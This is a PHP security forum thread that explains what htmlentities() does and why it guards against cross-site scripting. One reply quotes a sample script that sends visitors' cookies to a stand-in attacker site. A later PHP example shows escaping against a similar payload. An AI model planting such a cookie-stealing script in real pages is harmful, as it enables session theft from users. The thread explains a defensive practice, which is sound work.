The HTML Entities Function

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

The HTML Entities Function

Post by pilau »

Htmlentities... right.

Can somebody explain what it does actually?
Why do we need it? In what cases?

TIA
josh
DevNet Master
Posts: 4872
Joined: Wed Feb 11, 2004 3:23 pm
Location: Palm beach, Florida

Post by josh »

It turns anything that is a special HTML character into its entity. Entities are like HTML tags that cause HTML to be output "literally" to the browser, so that instead of <b>making text bold</b> you just get the bold HTML tag printed plainly to the screen. It's useful for posting examples of HTML source, but it is also a security necessity against XSS (allowing other users to 'inject' HTML into your page).
pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

Post by pilau »

Great, thanks mate.
Jenk
DevNet Master
Posts: 3587
Joined: Mon Sep 19, 2005 6:24 am
Location: London

Post by Jenk »

An example of HTML injection/XSS attack (Cookie stealing)

```html
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
```

Now if these forums did not use htmlentities (or similar function) then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.

But because PHP's htmlentities() replaces '<' with '&lt;' and '>' with '&gt;' (less than and greater than respectively) the code becomes, as jshpro2 pointed out, literal.

There are other characters that are changed as well, " (double quote) for example.
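Added example (not from this thread or any poster) showing the escaping Jenk describes in PHP. The untrusted input strings and the `example.invalid` host are constructed for the demo; `escapeHtml` is a hypothetical helper name.

```php
<?php
// Constructed input resembling the injected script from the post above.
$untrusted = '<script>window.location = "http://example.invalid/?c=" + document.cookie;</script>';

// Unescaped: the browser parses the <script> element and runs it for every viewer.
$unsafe = '<div class="post">' . $untrusted . '</div>';

// htmlentities() rewrites & < > " (and with ENT_QUOTES also ') into
// &amp; &lt; &gt; &quot; &#039;, so the browser shows the text instead of
// parsing it as markup. Always pass the charset explicitly so multi-byte
// input is not mis-decoded.
function escapeHtml(string $s): string
{
    return htmlentities($s, ENT_QUOTES, 'UTF-8');
}

// Element content: the <script> tag is rendered as visible text.
$safeBody = '<div class="post">' . escapeHtml($untrusted) . '</div>';

// Attribute value: without quote escaping a stray " would close the
// attribute and let the rest of the string become new markup. This is why
// the double quote (and, with ENT_QUOTES, the single quote) must be encoded
// as well. The value must still be placed inside a quoted attribute.
$attrInput = '"><b>not supposed to be bold</b>';
$safeAttr  = '<input type="text" value="' . escapeHtml($attrInput) . '">';

echo $unsafe,   PHP_EOL;  // would execute in a browser
echo $safeBody, PHP_EOL;  // &lt;script&gt;... shown literally
echo $safeAttr, PHP_EOL;  // value="&quot;&gt;&lt;b&gt;..." stays inside the attribute
```

htmlentities() only covers HTML element and quoted-attribute contexts; a value inserted into a JavaScript block, a URL or an unquoted attribute needs the escaping appropriate for that context instead.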
pilau
Forum Regular
Posts: 594
Joined: Sat Jul 09, 2005 10:22 am
Location: Israel

Post by pilau »

Cool, thank you.
$var
Forum Contributor
Posts: 317
Joined: Thu Aug 18, 2005 8:30 pm
Location: Toronto

Post by $var »

that's fun.